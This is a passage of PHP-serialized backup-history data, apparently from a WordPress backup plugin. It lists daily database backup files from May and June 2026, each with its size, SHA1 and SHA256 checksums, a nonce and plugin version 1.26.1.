f97e8e04cc0b7c31fb356859cbacbce1\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"867c41190a90f6a0ff0af8f8fcb1e6fbd086a7840ba49f95dfbd07c909db5b87\";}}s:5:\"nonce\";s:12:\"9d09c936a2fe\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1781572381;a:11:{s:2:\"db\";s:47:\"backup_2026-06-16-0113_AMB18_585402c83726-db.gz\";s:7:\"db-size\";i:2240571;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"75e1a89dc96c4ee191bceee9401a3838185d2ddd\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"2ad68639fe117cee4ba40d907524243de22404dc7011be59df15787b7b582b9c\";}}s:5:\"nonce\";s:12:\"585402c83726\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1781485949;a:11:{s:2:\"db\";s:47:\"backup_2026-06-15-0112_AMB18_6e17bccc8350-db.gz\";s:7:\"db-size\";i:2235427;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"708a9a6fef356be7ba5914d9373ad8ae975267c7\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"7213010a5b8950a8c84407fbe426143016dbe7ae0d26b10a29b0cef9f71bac99\";}}s:5:\"nonce\";s:12:\"6e17bccc8350\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1781399783;a:11:{s:2:\"db\";s:47:\"backup_2026-06-14-0116_AMB18_6d1ae919ee82-db.gz\";s:7:\"db-size\";i:2232756;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"19ad614187d1509f7d7d39eec81d589639e4fa80\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"f6010a173887a4d0b9d0e00196d10ffc32f570b452b5800b456eaf2b6570125d\";}}s:5:\"nonce\";s:12:\"6d1ae919ee82\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1781313157;a:11:{s:2:\"db\";s:47:\"backup_2026-06-13-0112_AMB18_33615af560a0-db.gz\";s:7:\"db-size\";i:2229139;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c2e614344d68b8c3838e66479b5c528911d1d28d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"5f33c66bd069a0b1d0ffbdc9b1561eb9e5fa61f6d5c4230e52172f89f26abcb6\";}}s:5:\"nonce\";s:12:\"33615af560a0\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1781226693;a:11:{s:2:\"db\";s:47:\"backup_2026-06-12-0111_AMB18_28260f0d3118-db.gz\";s:7:\"db-size\";i:2228085;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"7aa0c80e8603baf7db6a38e8edf0b329f163c544\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"67bd9a2c24e30a303e987c5615f3b8e700a62c087affd46caa27160cbcdcc650\";}}s:5:\"nonce\";s:12:\"28260f0d3118\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1781140575;a:11:{s:2:\"db\";s:47:\"backup_2026-06-11-0116_AMB18_46f71a768d26-db.gz\";s:7:\"db-size\";i:2225591;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"0277edf84bf2f89abe320a1ba98a986fbc1791ff\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"6a720cde9816c992897aaa69b010b753dcf711646b39998fd4d1ba1be2b0def7\";}}s:5:\"nonce\";s:12:\"46f71a768d26\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1781054031;a:11:{s:2:\"db\";s:47:\"backup_2026-06-10-0113_AMB18_e98f8eabbb6b-db.gz\";s:7:\"db-size\";i:2214631;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"be863a9381b2a67e29feef28b16ecddd09e56d0e\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"fcef9fd9d157773ccb5976694354809e7552b494a60df55384138e00fff3d386\";}}s:5:\"nonce\";s:12:\"e98f8eabbb6b\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780967562;a:11:{s:2:\"db\";s:47:\"backup_2026-06-09-0112_AMB18_31b6748e5e3a-db.gz\";s:7:\"db-size\";i:2209028;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"b3a3df0f14933345c06d38fe3513d6afb63aa3e2\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e5cc3fcc7e4fbfdf7c44e57f3afba540150e0f524c79c34ebce96248ff7ea363\";}}s:5:\"nonce\";s:12:\"31b6748e5e3a\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780881524;a:11:{s:2:\"db\";s:47:\"backup_2026-06-08-0118_AMB18_3acd3c1aeb29-db.gz\";s:7:\"db-size\";i:2201101;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3de34420b0ceada2154518808757fb69c091e257\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c8ee767b2e72dc1a644645369c296b2007b3544ea59545f0fa032dd2c836f881\";}}s:5:\"nonce\";s:12:\"3acd3c1aeb29\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780794766;a:11:{s:2:\"db\";s:47:\"backup_2026-06-07-0112_AMB18_8bbb52c9ff12-db.gz\";s:7:\"db-size\";i:2200444;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"346519d4d4349d4658e0a04df3d085a84f4b9f10\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"a9b3450dea4317d6a2e70967aace9bb3a90bd7b7bd68a0034e612401cf0ce3da\";}}s:5:\"nonce\";s:12:\"8bbb52c9ff12\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780708407;a:11:{s:2:\"db\";s:47:\"backup_2026-06-06-0113_AMB18_1f90678e6049-db.gz\";s:7:\"db-size\";i:2195729;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"a313928582c381b864afeb286802495a3c407e63\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e5f576a4c723c395e397e9655272e7ed4358a3fdc3fd21ecd9b84d0166e35a60\";}}s:5:\"nonce\";s:12:\"1f90678e6049\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780622454;a:11:{s:2:\"db\";s:47:\"backup_2026-06-05-0120_AMB18_9499ae992edd-db.gz\";s:7:\"db-size\";i:2191256;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"5ac4ab370257de4f4e5ef94d0b425572f86a841f\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"13ecc207ad8decbcf2b57734cb1c550701530c8291b7a5c2d68d55a65d941981\";}}s:5:\"nonce\";s:12:\"9499ae992edd\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780535720;a:11:{s:2:\"db\";s:47:\"backup_2026-06-04-0115_AMB18_879749d0e670-db.gz\";s:7:\"db-size\";i:2188974;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"451310d101ce0cc7813a43972f37a85925724599\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"a156d5bcf95ad1d7256bf5e6ee3ec5d7f55a6d8ed08b6b0ee99d34cb5bfa0820\";}}s:5:\"nonce\";s:12:\"879749d0e670\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780449066;a:11:{s:2:\"db\";s:47:\"backup_2026-06-03-0111_AMB18_9ce8b982b941-db.gz\";s:7:\"db-size\";i:2186451;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"6b73b82e6ef744124ceac0268604b15fec98b54c\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"1ce9cefc0640bc53ed89d9ab80788539140eccf417158872cea92b0d724ae8f3\";}}s:5:\"nonce\";s:12:\"9ce8b982b941\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780362702;a:11:{s:2:\"db\";s:47:\"backup_2026-06-02-0111_AMB18_f488a698551e-db.gz\";s:7:\"db-size\";i:2180837;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"35dc089298d6f853eb5eca75af377ceece701f75\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"1498f77b5211d28a07dc193e71ffb1d08d0f7b97c9a05e1834e84de1806a9738\";}}s:5:\"nonce\";s:12:\"f488a698551e\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780276282;a:11:{s:2:\"db\";s:47:\"backup_2026-06-01-0111_AMB18_523eebe590b9-db.gz\";s:7:\"db-size\";i:2179494;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"36310f41a40cbe28fa8f71e7a1f0cd62d8ded7d0\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"a2c28bf56eebe1cf3debd38576317d0a191100a12bc021e1cd1ceabb977bd818\";}}s:5:\"nonce\";s:12:\"523eebe590b9\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780190215;a:11:{s:2:\"db\";s:47:\"backup_2026-05-31-0116_AMB18_3accfbd82bc6-db.gz\";s:7:\"db-size\";i:2177074;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"0f5f999812a3a04c086dc04f32ba8a63e796fc78\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"78a1f350005e709e1ce207c33ae91c4b282416cc7a0d45b3be3d228d7be58009\";}}s:5:\"nonce\";s:12:\"3accfbd82bc6\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780103471;a:11:{s:2:\"db\";s:47:\"backup_2026-05-30-0111_AMB18_84844597ef2d-db.gz\";s:7:\"db-size\";i:2173339;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"cff3155665d5e7284c6027834a3756cde9f1f104\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"89a89c80747bc0ab4c348542e8e5a9354610e1f12bde422fade597fc5cfa7dfa\";}}s:5:\"nonce\";s:12:\"84844597ef2d\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1780017622;a:11:{s:2:\"db\";s:47:\"backup_2026-05-29-0120_AMB18_79d211f48128-db.gz\";s:7:\"db-size\";i:2170487;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"335823619dd8e6772384ad3bcfd55c3dc698da46\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"5216845ec98d366767e8ac03609cc9af2f9a978d704854d75c4b09b22a16e8d2\";}}s:5:\"nonce\";s:12:\"79d211f48128\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779932255;a:11:{s:2:\"db\";s:47:\"backup_2026-05-28-0137_AMB18_7514e3a0d472-db.gz\";s:7:\"db-size\";i:2164475;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"519f3f8258f02a8b8c9ac287bbdd58ba8da854e7\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"ad5f8ba9529f106fd04c2cdbe12f8c4ea620df838de5f2036b789e4d267c9373\";}}s:5:\"nonce\";s:12:\"7514e3a0d472\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779844484;a:11:{s:2:\"db\";s:47:\"backup_2026-05-27-0114_AMB18_471d07b7f197-db.gz\";s:7:\"db-size\";i:2163745;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"4ecdadc241ffb563cf556e28fb7a32aa7e31e45f\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"9b08e26bc0fb2b257161ed97eb0cbaded3a3f8f3a76d391ed3d5ae5063e5bf7d\";}}s:5:\"nonce\";s:12:\"471d07b7f197\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779757945;a:11:{s:2:\"db\";s:47:\"backup_2026-05-26-0112_AMB18_07d5f67c79ed-db.gz\";s:7:\"db-size\";i:2162241;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"59a0115b9ca8617629db97d2c9e9d0424a95f98b\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"7e7d7cc675eafc6a56f9b7e8fa723c37191b7b04b61472fdc8f2d5a4b871e5e9\";}}s:5:\"nonce\";s:12:\"07d5f67c79ed\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779671516;a:11:{s:2:\"db\";s:47:\"backup_2026-05-25-0111_AMB18_be0233f8baf6-db.gz\";s:7:\"db-size\";i:2161909;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"b7db6be668590a38212c39ac8a5f0d7ea58cb471\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"46e8a89108b4a52706e71192b4fabf24944db199400f16b8b226b07ccaba6f38\";}}s:5:\"nonce\";s:12:\"be0233f8baf6\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779585155;a:11:{s:2:\"db\";s:47:\"backup_2026-05-24-0112_AMB18_879d43beba4b-db.gz\";s:7:\"db-size\";i:2159059;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"d7415b512ecc12d0126b76c0016dd662ea943bcb\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"9671579f4db77ffc7c4a71bacf935ed143861e7cb4d35e7fe01d8bb9415922a7\";}}s:5:\"nonce\";s:12:\"879d43beba4b\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779498702;a:11:{s:2:\"db\";s:47:\"backup_2026-05-23-0111_AMB18_63e40b44e0f1-db.gz\";s:7:\"db-size\";i:2155098;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"500e628628506694411abd0ab756e532968cfc35\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"6d896ccfcc35e80fc247de4a68d5569aacc56d741e9a71eb7da6557a10fd7cf4\";}}s:5:\"nonce\";s:12:\"63e40b44e0f1\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779412266;a:11:{s:2:\"db\";s:47:\"backup_2026-05-22-0111_AMB18_6fd62a2bafd2-db.gz\";s:7:\"db-size\";i:2154344;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"571433bf5296858254f4dc2d7985f87797e54237\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"380fc171d049c1216fa23440ff9abe781070f3b75a6fad6dcb2c1eba01794fac\";}}s:5:\"nonce\";s:12:\"6fd62a2bafd2\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779326825;a:11:{s:2:\"db\";s:47:\"backup_2026-05-21-0127_AMB18_859f50b3b5ef-db.gz\";s:7:\"db-size\";i:2151403;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"99e123d869a60c78d76948c4cdea8770bd9e7140\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"ee868839240b431fdff67b5419a4092d2da5dd9291251f579ab02f90fbec23a7\";}}s:5:\"nonce\";s:12:\"859f50b3b5ef\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779239629;a:11:{s:2:\"db\";s:47:\"backup_2026-05-20-0113_AMB18_a2fa10fd0b5d-db.gz\";s:7:\"db-size\";i:2411888;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"ab1bc3b55b570d9e16384d208a676f2055ce7c6b\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"72f22f7c7ab5a1d76eec7a2bc06fba3e7a73c8ace25c3202cdf9b7d9de3413df\";}}s:5:\"nonce\";s:12:\"a2fa10fd0b5d\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779153049;a:11:{s:2:\"db\";s:47:\"backup_2026-05-19-0110_AMB18_ea8cb8a53dfb-db.gz\";s:7:\"db-size\";i:2100367;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"8aad234d43254c837c84135ce7731da0a3e91c6d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c87f82b57b9dea8a3050f4a4019231df2fb155708f3f9b9d95c0c4ea78976ad6\";}}s:5:\"nonce\";s:12:\"ea8cb8a53dfb\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1779066849;a:11:{s:2:\"db\";s:47:\"backup_2026-05-18-0114_AMB18_c37bfe2e89cc-db.gz\";s:7:\"db-size\";i:2094867;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"e223a0bb127add467e069bb8e448be64b3508437\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"9aeb0d647336910d7aadc246c627530f894909f571e3f6f6734fb632d076904c\";}}s:5:\"nonce\";s:12:\"c37bfe2e89cc\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778980258;a:11:{s:2:\"db\";s:47:\"backup_2026-05-17-0110_AMB18_6a26a49d6c1f-db.gz\";s:7:\"db-size\";i:2092223;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"e9470b9e364551c3f8eb9128171bead58b6edff1\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"44f1231a9c3431a57501b9ef371d2580f7fe88a437dc35deb541e261f18b3939\";}}s:5:\"nonce\";s:12:\"6a26a49d6c1f\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778893924;a:11:{s:2:\"db\";s:47:\"backup_2026-05-16-0112_AMB18_01cdec19a6a2-db.gz\";s:7:\"db-size\";i:2089817;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"f69a499dda2299e3e90183ae4061b022855c17be\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"d6d5e9c4a464cb95a230607eac8ac1556824b918a0143dc64c77bbdb631fb615\";}}s:5:\"nonce\";s:12:\"01cdec19a6a2\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778807473;a:11:{s:2:\"db\";s:47:\"backup_2026-05-15-0111_AMB18_abe2d3e13196-db.gz\";s:7:\"db-size\";i:2089041;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"6f18b8a1a02606f7082865175f897f2cc9caa057\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c4275c05514af3ac034fc0b79dc850bedffebe77d065119aeb9a82c3476abb73\";}}s:5:\"nonce\";s:12:\"abe2d3e13196\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778721114;a:11:{s:2:\"db\";s:47:\"backup_2026-05-14-0111_AMB18_9695cd7092e3-db.gz\";s:7:\"db-size\";i:2088152;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"b92cb8960341f6d4761426325243fdf0ccbf9d20\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"9bdf8aecdfdf4150ec5db90f633f20593da0732c567f2574a06339828c0931fd\";}}s:5:\"nonce\";s:12:\"9695cd7092e3\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778635714;a:11:{s:2:\"db\";s:47:\"backup_2026-05-13-0128_AMB18_b89efdf32790-db.gz\";s:7:\"db-size\";i:2087711;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c564ce79df2255d9228e17bbd695d30b6b5ee9f9\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"d700d325b94a20698dfda20eacd492a433fef1190474779488071477ed75dcc2\";}}s:5:\"nonce\";s:12:\"b89efdf32790\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778548987;a:11:{s:2:\"db\";s:47:\"backup_2026-05-12-0123_AMB18_b81a1518332d-db.gz\";s:7:\"db-size\";i:2085426;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"66e751a31253c533e0668db249607184986990bf\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"9fb9e6ca811aa01305126038ec2587a63319d83486c62967d4a35da3901f918f\";}}s:5:\"nonce\";s:12:\"b81a1518332d\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778462032;a:11:{s:2:\"db\";s:47:\"backup_2026-05-11-0113_AMB18_1a9a282592cc-db.gz\";s:7:\"db-size\";i:2083225;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"41c3147aad36d326ee8816cbb086b4ef18745ebb\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"8a57fc6b2c705e8eceaa3795d67f3762d115615bc65555ae89199fd072477c50\";}}s:5:\"nonce\";s:12:\"1a9a282592cc\";s: